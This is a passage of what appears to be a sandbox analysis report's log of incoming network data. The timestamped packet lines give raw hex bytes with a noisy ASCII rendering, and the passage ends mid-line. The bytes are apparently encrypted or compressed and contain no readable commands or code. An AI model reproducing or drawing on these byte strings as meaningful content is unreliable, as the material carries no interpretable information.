fe f2 ca 82 31 4d d5 69 42 82 dd b3 58 83 dc 4d 39 0c f7 d2 66 21 2b 0a e7 67 a9 fd df f5 28 8f 9a 24 2e c7 12 a1 b2 bd 6c b4 97 d6 95 b8 d8 90 0e 3c 8f 92 f8 67 f1 75 45 77 f2 f1 af Data Ascii: ]%^)Cw2t[e*%XOy#^do!!-~Hsm~fz;r`=9a_qduFlnjZxph,.Gy>A02_~}c;$$oxMX1MiBXM9f!+g($.l<guEw
2023-01-03 15:29:20 UTC	1159	IN	Data Raw: af ad df 3c e5 3d 89 68 ff 67 39 d3 23 a2 af 7e a0 16 51 25 35 41 6e 26 b5 be 67 98 0f e3 f3 f5 6f d3 83 80 c3 7f 4a 18 f4 1e 43 91 73 ff d4 73 4f 2e a9 1f ff 88 8c bd 1e 7e 26 f1 c9 93 03 c5 a1 84 7c 1f 07 80 01 03 1e e2 da cf ba 2e 82 3a d5 27 12 35 ff 80 b5 82 8a 69 3e 93 7f 4b 91 a5 6e ad 57 63 7e 07 81 1e 71 fc 7d 5f e6 ce 94 30 4e 80 95 5d 28 3b 1d 7a 57 81 05 bd e6 25 a2 f8 cd 3b f2 39 41 ea 57 22 76 aa 1e c5 cf 83 fe 30 8c 00 d7 20 18 34 87 55 64 82 e2 9f 11 07 14 9e 32 af eb 63 82 dd f1 ad c7 bb e0 d0 cf 4c cf 66 3f 3f ff b7 19 70 d8 17 fe 00 f9 2c 7a a5 ff a0 fb 2f 0d 8e 86 fe 87 fd bf 92 d7 20 e0 cb bf 4c ab e5 83 84 c4 a5 28 82 91 6c ed c7 1d 83 52 22 34 1d 29 f2 4b 91 d5 e8 62 90 8e 07 a4 65 95 b2 a4 04 5c 37 b8 e4 c3 9b 08 8c ae 3e 3f 77 8b Data Ascii: <=hg9#~Q%5An&goJCssO.~&\|.:'5i>KnWc~q}_0N](;zW%;9AW"v0 4Ud2cLf??p,z/ L(lR"4)Kbe\7>?w
2023-01-03 15:29:20 UTC	1175	IN	Data Raw: a4 8d 76 8c b4 4d ce 80 58 8d d5 59 94 50 ec 65 c5 4c 56 8e 1d 37 5a 38 8a 6f fc 90 4c 1b 62 22 49 b1 24 ed 99 5c a7 11 39 1d 4f 0e 39 fb 5b 5e a8 20 93 6b 1c 27 18 4b ba ee 19 d1 a2 97 e1 e7 0f eb b1 df 3f 2b 47 2c 29 cb c8 e9 98 34 74 b7 fe cb 05 26 e0 bc 3f c4 29 64 69 f5 ab b6 74 1d c8 56 42 c3 e7 d8 18 63 7b bf 53 01 f5 d2 d8 02 23 b4 1e 8b 66 f8 b0 72 ce b0 fb 4e 91 0b b4 98 88 29 0f 24 73 aa 5c 23 e6 e2 0a 20 54 80 84 52 72 9a 89 88 61 f0 10 c7 44 6a 0a 6d 25 e6 bf 44 ab bf 22 5f cc d2 ed 35 8c 78 9e 2c f1 a9 62 76 ef a5 67 76 6e a1 66 1c 99 90 7e 85 b8 2f 3f 53 2f 18 ab 9a 6e de 91 50 48 3e 52 28 83 9d f0 bb 24 54 5d 2d dc 56 8c 72 a5 83 4f 6e 07 7b 34 1d 0b be f8 9d 13 99 9c d3 a3 4c 8a ae e1 eb eb 7f f2 a9 82 f3 da 9a 4f 42 65 b4 fc cc ef 53 9a Data Ascii: vMXYPeLV7Z8oLb"I$\9O9[^ k'K?+G,)4t&?)ditVBc{S#frN)$s\# TRraDjm%D"_5x,bvgvnf~/?S/nPH>R($T]-VrOn{4LOBeS
2023-01-03 15:29:20 UTC	1176	IN	Data Raw: f2 7c a4 66 7d 62 09 df 25 e4 4c 3a ce 54 ce f2 a4 89 15 c4 1f 33 bc 69 b6 dd 77 c8 b3 5e 26 ba c1 0d a3 b6 fe 78 fe b4 69 9d 38 b2 ec 13 2e 04 cb 79 17 49 ac ba c4 4d 38 05 ec 14 14 49 3c e2 77 49 ec b0 98 23 66 1e bd 2e 95 6c 85 2f 08 7a 61 66 f9 da 9e 56 78 44 01 aa 96 e5 a4 7a 6a 02 b5 ff ee d1 f3 a5 41 f3 92 cc a9 df 24 ad 5b 60 b6 a5 34 1b a4 a4 0e e8 f7 47 2d 51 d8 e7 ed e2 f4 49 c2 16 b3 6c 1c 45 d3 f1 14 ce 1a 25 99 9b b7 75 25 20 0e 68 98 58 90 1a 17 87 e5 3d 5d 60 04 7e 35 65 8a bf ae e8 ba 9b cd 8f 29 30 83 06 66 12 17 bb f7 13 eb dc 8d 53 68 24 ad 2b 55 4a 1d 13 f4 bd 3b 5a 25 ed 5d 8f 94 1f cc 9d ec cc d8 14 36 1a 72 8b 5e 08 dd f2 b3 cd 69 4b 19 b2 fb 6c 8f 88 11 eb 66 1b 64 ba 3d 75 90 a4 45 43 65 a9 1a ed b1 59 81 d4 7d 18 72 4b f4 e2 b2 Data Ascii: \|f}b%L:T3iw^&xi8.yIM8I<wI#f.l/zafVxDzjA$[`4G-QIlE%u% hX=]`~5e)0fSh$+UJ;Z%]6r^iKlfd=uECeY}rK
2023-01-03 15:29:20 UTC	1192	IN	Data Raw: c8 c4 e4 d7 1e 6c d0 e6 4d 5d 47 0a a7 f8 38 ad c6 37 c8 1b fd 1b 1c 94 14 ec e2 57 c8 fe cf 59 83 be e1 f8 47 ce 94 06 b0 b4 c3 84 6b 93 0f 87 8f 32 db d3 92 67 b5 ae 89 ee 1b 53 a9 a9 b9 89 31 85 55 a7 05 fd d6 e6 9a 8d e0 a5 b3 54 89 d3 05 84 ae 60 40 9d 36 73 d9 a0 27 fe 96 16 72 6a a3 96 95 87 61 26 ad 36 1a ec d4 1f 41 0c c0 10 2d a2 8f 29 0e 91 c3 16 b5 aa fe b1 17 dc 67 fc 5f 79 e9 37 c3 b2 ed ce e5 01 a3 eb 12 31 b6 aa 03 0f 34 48 58 ac 98 55 91 cb f7 b7 a3 c8 4d 10 7f 63 d0 c2 c6 a6 45 d2 b6 14 24 c9 cc ec 57 26 a8 63 1f e8 2f ca fc 95 a0 ae 3d 13 a1 0b 61 80 69 8c 8a 50 d4 df 53 9f 57 ee a0 c4 d7 72 89 88 40 0b 7c 16 00 9a b0 bd 40 79 44 44 ad 33 f4 1b 8d 14 e5 1b a6 39 47 58 b7 16 98 89 99 63 5a 7f f1 81 45 ac c2 9b 41 20 f8 42 e1 49 27 51 0e Data Ascii: lM]G87WYGk2gS1UT`@6s'rja&6A-)g_y714HXUMcE$W&c/=aiPSWr@\|@yDD39GXcZEA BI'Q
2023-01-03 15:29:20 UTC	1193	IN	Data Raw: ec d2 5c 9d b9 9b 33 66 6c 80 8e 94 b4 4d 12 ce b7 8e 48 64 3a ca 1b 79 80 79 7b bd f9 2f 1e 1e 50 8c 59 21 f9 cf 22 a6 ca b9 1c 2a 5d 81 df 31 cc c3 ae 92 72 de f7 51 05 13 82 6c 16 0f 89 81 80 1e 5f 14 fc db 13 c3 72 f7 48 0e 73 05 f5 41 6f 66 eb ff 84 46 15 0e 36 9b fb a1 bb f3 c4 86 0a b5 ab a1 6f 1f 4f 50 6f 4f 26 8e 88 50 fb ed 17 4f 02 c0 2a b2 8d a3 87 7b f5 24 5e ee 9f 21 62 76 53 ec e2 70 e6 06 ce 67 ce 4d b8 f4 b4 99 5d 52 75 54 ac 63 dc 52 90 42 07 8f 2c 0b 58 67 f5 99 45 9a d6 27 a2 16 23 ac 60 1f 10 13 82 00 11 a3 c7 8c 37 b1 fb 04 b7 26 f9 5c 50 98 6b 12 2a e2 fc 9c f0 f6 4c 05 a2 23 a3 67 8d f3 fa 55 45 52 b2 55 48 f5 fa ba 92 be c9 0b 2b 0d 19 3f 0e 2a ea f8 6a cb 4a 1a 10 93 f0 d3 2e 64 4f e4 c7 64 ac cd 1b 84 b3 ba b0 2b ca a9 65 37 3a Data Ascii: \3flMHd:yy{/PY!"]1rQl_rHsAofF6oOPoO&PO{$^!bvSpgM]RuTcRB,XgE'#`7&\PkL#gUERUH+?jJ.dOd+e7:
2023-01-03 15:29:20 UTC	1209	IN	Data Raw: 7f 35 30 1d 27 fa 35 dc f7 99 28 7d 11 b7 af b2 8b 58 f9 cf bf 03 b8 26 c8 33 70 c7 bc 73 aa 0a b6 16 99 26 ea 78 87 11 3e 07 99 06 6d 33 6b 3a 06 c0 00 c6 e6 46 41 14 c0 96 5f 0b 08 5b 84 c6 db 4d 12 18 53 ef d7 53 a4 68 9a 13 68 11 12 60 d6 eb 38 85 91 73 f3 0a 66 0a a0 c9 00 71 3e a8 df 44 ac 50 17 1c ca eb f0 e5 52 eb 28 7c 72 46 1c fc 3e b8 8e 0f 56 c8 bf 63 e8 5f ba 44 7b a3 89 1c b8 5c 4f b1 d0 ed bf 9a e5 79 83 5e ba 04 af 93 bb dc e3 da 85 b2 20 c8 70 45 09 a8 fd 14 41 ca b6 2a 0c f7 4b 25 a8 99 fc 44 5d db a0 d9 c1 78 bb 36 c6 99 49 eb db 90 3d 6e ca 62 11 27 46 f1 91 11 ed e0 43 68 0c 01 2c 47 9d 4f 88 c1 c2 47 57 ef 16 95 b4 e2 09 70 34 46 3f aa bd 07 35 94 db f5 05 c9 ab 7e 8e c8 2c bb f2 c3 17 0d d4 5f 2c d9 d9 2c f9 af 81 ef d9 2d 3d 3d d5 Data Ascii: 50'5(}X&3ps&x>m3k:FA_[MSShh`8sfq>DPR(\|rF>Vc_D{\Oy^ pEA*K%D]x6I=nb'FCh,GOGWp4F?5~,_,,-==
2023-01-03 15:29:20 UTC	1210	IN	Data Raw: ff a0 75 65 cd 04 09 49 11 40 43 af 24 43 e6 9f d2 0c 5f 04 6c 32 1b eb 66 b2 a7 8f 2b 60 c9 d1 fa 13 4a bc 14 c1 ec da 7d b0 c5 48 96 05 d9 5a f9 4a ad 85 ff 0d e3 27 93 e2 e6 ec b7 2c ae b0 ba 86 31 17 45 9e a3 37 b7 54 67 07 4e ea a0 b4 6b 94 4b e7 d0 69 1f ed c6 ac 42 06 62 42 7e e2 fa 3a 90 95 97 2c 96 86 06 cb 35 74 27 ae af af ac 7c fb bd b6 e6 eb 55 ef f5 ba b8 d5 37 fc f1 f4 61 52 f2 75 71 b8 6f e9 f2 b6 e6 49 e0 5d b6 7f e9 e1 e1 61 b1 b9 86 9f 74 39 e9 98 01 1f ac 85 c4 fa b9 8c f8 30 cb d5 23 d5 54 ae 88 1d db cd 03 57 0a 04 43 38 2a 70 48 1a a9 2d 3e 2d a3 d1 0b 8a 9d e3 8e c3 3e 26 2a dd ed e0 74 2c f4 f8 5a 0b e4 04 7a a0 88 a2 ea d6 c5 85 85 e9 e7 6f 5f 0d 59 96 fe bc 17 fb da 71 af 70 b6 c1 80 7d e6 1c 87 6b 61 1a e4 f1 b9 ca 3b 20 d0 c3 Data Ascii: ueI@C$C_l2f+`J}HZJ',1E7TgNkKiBbB~:,5t'\|U7aRuqoI]at90#TWC8pH->->&t,Zzo_Yqp}ka;
2023-01-03 15:29:20 UTC	1226	IN	Data Raw: b1 f7 91 a3 91 8a 20 37 a1 cf 55 c1 7d a7 22 04 13 ee 44 80 7d 59 65 0a 2e 3e 84 64 0a 63 f2 9d 4a 85 77 28 f5 be 6e a3 55 c1 b3 c0 0c 75 52 00 92 dc 41 9e 2c b1 95 63 56 40 fc b0 75 3a 43 62 91 80 c2 8e 37 4f d3 bb cd 75 3a c0 37 27 3d c4 4a 78 31 ca 1a 83 7f 7a a4 2e e3 b8 32 ea c1 bd 53 c7 52 0e 12 95 a6 44 ce 62 5f cd fa dd 2e 38 bf 87 27 3c ce d9 43 c7 ff e9 e2 df 69 ed 11 0b ba cd 20 80 73 c1 da b5 29 2d 18 2a 58 8e b4 3c bc 44 db a0 10 6b 60 19 a0 af 43 3f 54 29 62 81 67 fa 5f 7b 71 d0 2c 46 75 24 5e 98 29 5e 13 d2 49 65 bd 94 a4 33 2a c5 ef 1a ab 47 81 e8 f1 10 48 3d ab 29 b1 49 b4 59 77 f3 fb 37 4d 7c 7d 80 21 f2 9a 2f 53 98 3a d2 3d c1 a9 7a 2f 03 e2 6b 0c 6a 12 bc 63 10 23 e2 42 48 1d 1c f4 b2 38 12 51 4c b4 7b 28 bc 89 67 c1 3b 67 84 f8 32 b4 Data Ascii: 7U}"D}Ye.>dcJw(nUuRA,cV@u:Cb7Ou:7'=Jx1z.2SRDb_.8'<Ci s)-X<Dk`C?T)bg_{q,Fu$^)^Ie3GH=)IYw7M\|}!/S:=z/kjc#BH8QL{(g;g2
2023-01-03 15:29:20 UTC	1227	IN	Data Raw: 95 45 c3 5e bc 36 f5 ed 89 d8 a5 55 62 52 9e 8d 55 73 63 92 2a f2 8c 1a d9 a9 1f b7 76 c8 ca 92 33 f7 69 52 eb ed 76 ed b1 69 36 78 8b e6 f9 14 52 6f 80 c5 d4 47 b2 69 f2 db c6 f5 62 54 f5 8c 11 52 93 15 f2 fd e0 64 ee 8b 19 97 a4 dd b9 fa b7 a6 d9 de 94 7a 11 4a 54 8b e2 18 2c 8c 5f 8d 43 b2 15 f0 66 88 be d0 39 68 23 93 24 5f 3c 1d b6 41 73 9f b9 ee 91 75 40 50 72 a9 b3 ac a2 e5 18 87 be 92 90 dc 6a 18 bd 6e c2 c8 e5 90 94 07 d2 5e bf bb 2e b0 9a bf 75 94 6e 57 fe c7 e3 4a 8c ae fc 18 30 a1 af ce a8 32 ea b1 34 d2 33 ab 89 e0 f5 55 ef f9 49 be 82 ba 6d 55 ad 81 72 bc ca 8f 7a b0 1c b6 37 5c 42 8c eb ea 7a fb e9 69 78 fe 91 e1 f8 d7 f5 f5 f1 31 07 23 7b dd e2 45 0a f8 cd ea 74 8b 97 4a 1d 99 31 e2 a3 b8 26 0f 37 ae 3d df e8 bf a3 c5 30 d6 35 45 43 63 a4 Data Ascii: E^6UbRUsc*v3iRvi6xRoGibTRdzJT,_Cf9h#$_<Asu@Prjn^.unWJ0243UImUrz7\Bzix1#{EtJ1&7=05ECc
2023-01-03 15:29:20 UTC	1243	IN	Data Raw: 8d 66 5e 3c 8b 4c 45 6f 1a da 26 94 35 1f 61 64 c8 7b 54 2c 49 0d e8 7f b2 d6 4b c3 c4 1b 5d 62 e4 91 44 48 c9 2e 7a c1 e8 0a 15 ea 1f 30 1f c8 92 25 5a a6 14 de 29 c1 19 db e3 90 1b ad 94 a5 6b aa a3 d3 88 29 fd 58 b0 75 97 34 bc c1 7b e3 0c ff 19 63 94 6e 99 66 d5 ba 10 2a a5 c8 54 11 df 54 a1 f7 28 9e da 84 87 5d e6 c2 c6 15 48 fa 5a 5a 3a d3 30 63 a5 58 5a 18 fd fd d7 45 c7 17 5c 0e 8c 29 35 51 5c fc 17 22 ca 30 2b b3 bb d2 61 03 d1 a6 59 df 2d eb 1a de d6 e9 8b 85 c1 14 ec b4 22 f9 21 a9 93 99 61 cb 7c 9f c1 3d 24 23 e9 d3 ad 27 d0 dd fd 59 0c ba 85 64 ee 9e 8d 37 64 f7 a5 03 83 6a 6c f7 a7 67 97 9e 3a a0 e8 23 6e e8 d8 85 47 15 9f 24 62 1d e7 a8 40 ce e0 9c 7a fd d6 54 ec ad 55 8c 25 80 ac fa 97 1a 06 5e 72 5e 61 ab ac 63 7c ae f1 82 e5 36 e1 28 05 Data Ascii: f^<LEo&5ad{T,IK]bDH.z0%Z)k)Xu4{cnf*TT(]HZZ:0cXZE\)5Q\"0+aY-"!a\|=$#'Yd7djlg:#nG$b@zTU%^r^ac\|6(
2023-01-03 15:29:20 UTC	1244	IN	Data Raw: d9 14 9a 46 f3 e5 5c 31 94 e2 83 f8 3f 6b b5 b3 f3 40 e3 bf fd d4 17 83 ab ed e5 37 41 12 30 e2 73 73 8d 76 d6 e5 5c 9f 42 01 25 f6 33 7f 27 a5 24 2c 75 06 c9 be fd 68 eb d0 c5 09 c6 a1 da 24 a3 fe 52 53 08 96 e5 c1 65 63 ae a4 85 a8 bc d1 94 f0 34 8a 5b 20 2c af 69 4f 1e 7a f6 be b5 ad b5 02 07 ea 55 86 7c 59 f0 b3 6f 07 fe 9d 45 09 67 e4 4d 49 99 6e 95 b6 fe 0d a9 17 17 4f 07 10 72 fc 90 5d 08 bf 4a 04 72 4f 4d 5f d1 25 7e eb 22 d4 21 47 09 5c 0b d8 cf 23 ae 11 26 04 d5 62 83 12 8e 3d 96 ae b3 36 59 8f cc 1e ab cf 48 fd 4e 9c 77 17 31 22 85 c7 f9 55 f6 b9 1d bd 44 d7 0b 34 ec 4f 2b da 1c 06 50 50 2c 36 6d f5 60 bf ed 6a f5 62 65 01 5f a4 60 9a 9b 38 4f ee fe 64 4a 6f bc 3c d3 ae 79 4a 9d 48 02 20 93 3f 7f 00 a1 6a b9 2e ae 3b 4b d2 25 9f d5 d4 9c 0c 12 Data Ascii: F\1?k@7A0ssv\B%3'$,uh$RSec4[ ,iOzU\|YoEgMInOr]JrOM_%~"!G\#&b=6YHNw1"UD4O+PP,6m`jbe_`8OdJo<yJH ?j.;K%
2023-01-03 15:29:20 UTC	1260	IN	Data Raw: c8 68 e9 c3 ad 04 35 21 de 22 9d 05 36 f4 80 49 98 08 cd cf 45 08 d2 a0 44 42 fe 49 98 96 2e 0a ce 8c c1 eb e8 41 eb 59 0e 8b 51 8e c7 aa f8 1f b5 df 52 d1 36 29 e9 3d 7c c5 d0 55 d4 f8 66 fe 4e 62 95 d7 10 7a b5 5a 78 1d f1 99 51 ab bf 4b 8e a2 78 14 db 9c f9 5f 36 5a de ec 1c 88 17 89 cb d8 48 65 c4 2a 33 17 c3 04 d0 44 2e 07 a6 c8 94 66 d0 d1 0b b0 81 65 11 5a 81 43 18 34 02 ce 91 44 7d 3e 50 43 32 15 cb f2 72 bb 69 2d 1c af 79 08 74 b8 bf 01 5d 74 fa ef 80 8b fc 9f 38 c4 a3 ed a5 21 57 22 18 f8 3c 79 04 aa fa a1 ea c0 19 d5 1c 06 70 98 da 36 19 84 1b 66 8b 89 1e b3 b6 b2 35 87 a9 cf 10 ba d5 05 5e cb 89 59 12 ae 35 d8 45 02 ba 37 7b 92 4f 85 3e 58 a2 b3 3c 2e 1c ae ad 5c 56 f4 0b b4 b8 71 24 65 a2 ae 2f 67 02 95 4d 02 47 75 99 95 04 63 2b 8c 2d 3b 3b Data Ascii: h5!"6IEDBI.AYQR6)=\|UfNbzZxQKx_6ZHe*3D.feZC4D}>PC2ri-yt]t8!W"<yp6f5^Y5E7{O>X<.\Vq$e/gMGuc+-;;
2023-01-03 15:29:20 UTC	1261	IN	Data Raw: 87 3d 1a 98 9f a2 e4 7d e8 dd e4 a3 6a 23 e3 ac fe 9d 1d 41 11 57 af 10 21 2f 3a 4c d7 1b 21 9c 4d f1 fa 9a ad 0c 87 52 d7 9d 74 78 83 72 28 06 b7 8a 78 57 06 7a a0 29 aa af 57 7f 72 0f bc 71 bd a1 62 5c 24 83 16 e0 e7 1c 3e 38 82 14 7f ef c6 46 80 14 04 15 b8 64 0b 1f c5 bc e5 48 f8 67 1f 50 4e 12 e0 93 b8 24 43 d2 10 0a d9 9d 85 fc 30 38 4c 52 0e c0 75 e1 5a 93 21 ad 4e b8 79 47 16 e0 5a 17 83 a1 7e 82 45 6d 6c 30 2b 65 46 3d 01 bd 1e 3e 6b a6 9b b4 8e f4 c1 e1 2c 80 27 b9 56 96 f4 eb de 51 bf 4d c6 8f e0 c5 c7 87 c0 9b fe 8a bb 07 b2 19 21 b9 09 0a 05 26 12 a4 bd c9 de d6 91 59 3a 1e 39 9d fa 63 b3 9b 42 20 41 1e ec 9a 80 60 5a 35 f0 00 62 22 13 12 d1 86 f9 fd 48 47 81 59 8b 83 0f ff 1b b1 01 30 b3 0d 38 86 4b 76 b5 57 46 af 55 34 7c 81 93 1d ed 34 91 Data Ascii: =}j#AW!/:L!MRtxr(xWz)Wrqb\$>8FdHgPN$C08LRuZ!NyGZ~Eml0+eF=>k,'VQM!&Y:9cB A`Z5b"HGY08KvWFU4\|4
2023-01-03 15:29:20 UTC	1277	IN	Data Raw: 52 d1 fc 3b bd ce bf 8c 58 35 b7 c8 a8 8d 94 c6 fc f1 54 8c 13 c8 f6 15 a0 3a 44 b6 e7 ce fe a2 fb 7d 5a 51 60 00 53 f9 05 b9 e8 f3 6d d3 6f f3 2b 4f a5 f4 ee 15 bc 3d 51 0e 8b 53 a6 85 9a 24 72 05 06 26 ce 6a a8 a4 10 6a 11 19 b1 c5 e3 ba ea 61 1e 5c 2b da 73 cb 93 cd 16 ca 17 ea ac 1b 03 94 86 85 a7 1e b0 54 f1 33 61 b9 f2 5d 13 84 17 a8 f3 44 ef bd b3 19 17 4a 02 ed b5 82 67 4e 24 19 6d 39 5d ad 59 93 a5 50 52 55 33 7f 57 9c 1a 79 e7 cf 83 ea 67 16 63 11 fd 32 18 16 df 09 fd 08 55 7b 1e 99 22 1b d0 45 82 99 29 17 02 fb 01 8b d8 4a ff bc e1 97 02 a9 16 84 36 f8 ce 2a 71 d0 77 54 ef 16 3d dc ef 90 8f 1a 67 b2 f0 10 25 ce 3d 66 11 cf 58 77 1f 0b b4 a4 8e 70 8a 85 e8 0f 6b 39 10 42 62 17 d6 c1 d2 7e 20 4e 2d 11 aa 18 58 0f 4a 21 aa 36 05 17 2f 3b 6c a4 86 Data Ascii: R;X5T:D}ZQ`Smo+O=QS$r&jja\+sT3a]DJgN$m9]YPRU3Wygc2U{"E)J6*qwT=g%=fXwpk9Bb~ N-XJ!6/;l
2023-01-03 15:29:20 UTC	1278	IN	Data Raw: a9 db 14 35 d1 aa ef 12 7a 25 c9 e3 32 90 51 c2 60 83 89 41 53 08 d6 26 5b 7d 53 89 c9 76 99 6a 46 98 c1 91 38 54 83 21 8f cc f8 b7 29 f2 0a 66 27 88 d2 35 39 4f e8 d4 70 43 a3 f4 45 0f f2 ad 49 20 fc 15 df ec 34 9b 85 d6 49 55 20 cb 5d f3 98 e1 0c 1e 0e 92 7e 71 54 06 fc e8 2c c3 59 c7 d3 31 2f 46 51 03 5b 8c 5d d3 46 0f 14 45 9b 05 81 39 e3 1d 38 6e d8 94 91 cb 62 82 61 f1 d0 0c 8c c5 cc 34 1e a4 ad ac 61 85 36 b3 99 8d ab 1f e2 2e 93 62 83 99 b5 72 51 4d 1f 75 93 c4 d5 5e 98 76 c3 35 a1 da 94 4e d5 d8 a9 1f ce 0d 28 0d 48 93 da 13 86 b1 ed 83 81 9f c7 80 bc c5 1e 07 3f 9d f5 1e 01 fd b0 45 66 da bd 35 51 a9 3c 96 27 f1 12 3a a6 e5 be 43 95 13 33 4b ba 5e 5b 46 de 92 0d 88 f7 15 51 70 f0 23 7e 0e 8b c0 91 31 b1 97 4e 43 cc 0d 04 b7 d9 98 48 c3 7b 4d 4f Data Ascii: 5z%2Q`AS&[}SvjF8T!)f'59OpCEI 4IU ]~qT,Y1/FQ[]FE98nba4a6.brQMu^v5N(H?Ef5Q<':C3K^[FQp#~1NCH{MO
2023-01-03 15:29:20 UTC	1294	IN	Data Raw: f8 84 48 e9 a5 ef 23 c9 c1 13 02 e9 ea 76 8a fb a7 c4 a3 4e 45 4a 82 51 df 01 e7 3d 62 52 8d 38 9c 0d ec 94 2f 0e 21 86 d2 6e a6 8e 20 b9 79 8b 13 b6 ce 3b b6 c9 c6 c3 99 5a e0 1c de 43 65 e8 e4 15 5e 79 ec 13 76 16 f7 a7 10 83 83 4c 37 f3 c5 fd f2 21 a3 26 b0 47 53 c9 ed ca bd 98 f1 a4 4b 78 da b2 f9 b5 e0 f2 53 56 3f 53 f0 57 fd 27 b1 0a 82 6f 4f f4 a8 ee 4d c6 92 c9 d7 8a d8 9b a4 e4 58 fe ec 9c 42 b2 3c ac 6a 66 d0 45 a2 ae 68 2e 63 11 fd bc 30 c3 2a fa 98 f2 4d e8 c9 48 45 93 59 03 04 cd 87 01 6a e7 36 13 f1 7a 55 4b d3 71 e1 fc 15 b6 70 47 ca 67 c7 6c 08 83 e9 74 4d c6 33 b0 a7 e8 f1 a6 ec cf 53 7b b4 d0 9f b1 b5 2b f3 bc f2 9a 96 fc f4 e3 30 56 70 36 41 aa f4 29 09 0a 18 a1 76 ee 3b f6 36 10 9b 57 a5 50 06 97 54 86 38 3d 74 99 b9 ec f5 c8 75 a1 18 Data Ascii: H#vNEJQ=bR8/!n y;ZCe^yvL7!&GSKxSV?SW'oOMXB<jfEh.c0*MHEYj6zUKqpGgltM3S{+0Vp6A)v;6WPT8=tu
2023-01-03 15:29:20 UTC	1295	IN	Data Raw: 1a 9a f3 3d ba 55 13 6c f4 f9 1a d2 29 f4 b3 97 7c d4 bf 74 af 5c c7 1b 2b 92 cb 73 b6 aa cf 77 06 e9 f0 c9 16 49 01 49 1d 6d 42 01 1c 07 6d 97 5f 6a ba 51 29 af 79 e5 37 4d 3c c5 1e 7e 74 88 8a da fc 01 21 ab a7 77 63 20 0c 1e 5f 2f 47 b8 b7 3a 88 9e e5 de 9e 2f 37 95 2e 1f 17 47 40 97 67 9e 8c d7 8c 01 fa ee a8 43 1e 9d 67 7e 17 49 e6 c8 d8 a5 91 00 a4 0f 8c 8a 8a 2a f3 a5 c2 37 02 7a f2 e4 a6 86 f2 9c 15 6f 78 74 b7 ce a8 8f e9 de 55 17 9e 48 b8 ea d5 99 2b 35 d8 bb ce 38 f3 75 cd 5e 13 6c c3 9c ec 5e 8c 7b 46 ed 49 75 cc be c1 a5 bd 33 1b e1 57 35 c5 68 8d d7 4a 61 8e a8 6e bd 9c bc 6e 20 ec e6 e5 80 2b 1c 9d ae c7 aa 9d 99 a9 49 f4 11 68 a0 3e 24 21 e0 89 76 03 33 76 5a 1b 6c 03 61 27 b1 fa 54 82 c7 42 92 c4 a6 06 42 83 6d e9 0a aa c3 16 3e 7b c5 52 Data Ascii: =Ul)\|t\+swIImBm_jQ)y7M<~t!wc _/G:/7.G@gCg~I*7zoxtUH+58u^l^{FIu3W5hJann +Ih>$!v3vZla'TBBm>{R
2023-01-03 15:29:20 UTC	1311	IN	Data Raw: 98 fb f9 94 f7 2d 80 e8 11 22 98 67 7f 13 2a 3b 24 b9 89 df 76 9f 47 3c 44 5d 12 08 07 aa 79 e8 6c 10 61 10 75 0e a5 6e 06 ef f3 49 97 d0 dd fe 31 a4 36 cd c1 41 be bc 26 b4 31 2f 03 55 01 69 d0 42 95 c4 c5 02 3b 6d da b5 00 f6 b2 4e ea 90 05 07 ef 01 a4 ad 80 68 75 c0 62 e6 74 0e 03 c9 76 ae f3 3a 37 a9 71 2f cb 77 46 dd 0c 94 94 1a 5b 4b 10 1c 3e c1 56 cc a2 35 9a 9f 0d 49 85 f2 2f 4c a4 9c a4 01 81 6f 11 3b a3 bc 2c 4a f5 9c df be 5f 59 40 b3 57 38 20 ec 38 b3 e5 6f 6a ff 04 98 f6 a0 c2 86 6b 96 c9 3e 3d 0b e7 86 12 7a 65 0b 4f b8 83 02 24 bd 17 f8 3e 14 c3 df 74 66 fb 59 f1 25 c9 55 ad af db 9a 2b e4 31 ca 03 54 b1 37 4d a8 02 0e 32 15 30 0a 84 7f 4b 0c fb 9b e2 5b 93 a9 32 6f d9 55 68 d0 b9 e2 2b d6 36 e9 51 21 30 44 7b d8 82 65 8b ad 84 08 23 f8 84 Data Ascii: -"g*;$vG<D]ylaunI16A&1/UiB;mNhubtv:7q/wF[K>V5I/Lo;,J_Y@W8 8ojk>=zeO$>tfY%U+1T7M20K[2oUh+6Q!0D{e#
2023-01-03 15:29:20 UTC	1312	IN	Data Raw: b5 5a 94 23 99 ed d7 c9 03 f4 60 17 98 70 eb c5 70 8f e8 e8 33 8b 55 3e 2b 60 b8 b0 29 68 14 2f e2 fb 7b 8e 43 65 60 a6 b1 e9 ff 76 b9 b9 81 ed 4f 8d c1 55 9f 34 0f 6a ab dd 84 38 a0 42 e4 3c 99 df d8 92 5a e9 20 ec e2 15 c1 ea 7e 5d 3c ce 43 b2 4b ce 48 66 7c b6 79 8e 2b f4 3a d4 16 18 fc c6 bf 46 9a d8 cd ce dc 96 02 b5 00 7c 49 df d1 e3 30 10 02 e7 4d 12 8a 55 60 aa f3 54 f0 e0 90 29 11 5a 08 de 95 aa fd 23 18 3d b1 39 da 06 4c 3c 5a 2a a5 3b 79 50 70 16 71 a3 6b 03 d0 89 d4 4f 18 6a 7b 2a 0b 48 a7 7a 9b 64 49 56 25 43 1a e0 90 b1 33 4a 8f fe 2e 16 b8 98 81 96 19 6b 95 3c 82 11 a1 b8 09 f9 0c f1 5d 2a de 78 ca b7 ad 9f 40 1c 03 85 b4 4a 02 5c 34 78 b9 78 a2 7b 4e c4 f5 c0 11 96 88 17 df 02 3b 3f 5d d2 34 b2 4b 73 7d 0a 88 20 8c 15 e5 e9 54 24 01 a7 50 Data Ascii: Z#`pp3U>+`)h/{Ce`vOU4j8B<Z ~]<CKHf\|y+:F\|I0MU`T)Z#=9L<Z;yPpqkOj{HzdIV%C3J.k<]*x@J\4xx{N;?]4Ks} T$P
2023-01-03 15:29:20 UTC	1328	IN	Data Raw: 8e ed a8 12 12 7e 96 b5 96 11 ff 6e 2c 91 23 3a 05 ad a3 45 76 d6 cd 1e d0 0c 30 ec 1e 42 9b 32 26 e4 3a c8 74 1a 1d 5a 77 01 bc 0b f1 7d e7 64 f2 c7 6c c7 95 00 71 0e 9e 4b 92 ef b4 3b 7c d4 48 61 27 37 fc 85 6b 90 3c 85 0a ee 12 0d fa ff 00 9a 20 f1 9d b6 be 62 21 47 ab ac a9 fa 34 15 fc cf 73 fb a5 8e e6 ff d8 ed 97 b0 4e ff dc 7e f9 fa fa fa f2 fc fc f4 f8 48 2b 6a 41 21 68 42 23 62 4e 29 64 fa 6f 3f 38 46 c6 6f 74 75 75 75 77 77 df d1 d1 41 25 62 76 78 78 b4 bc b4 74 7a 76 46 ca 67 70 73 73 d3 09 03 43 2d 64 ba be b1 0d 0b 0b db 83 c2 3a f8 67 ba bc b6 e3 04 97 7e 7f ef 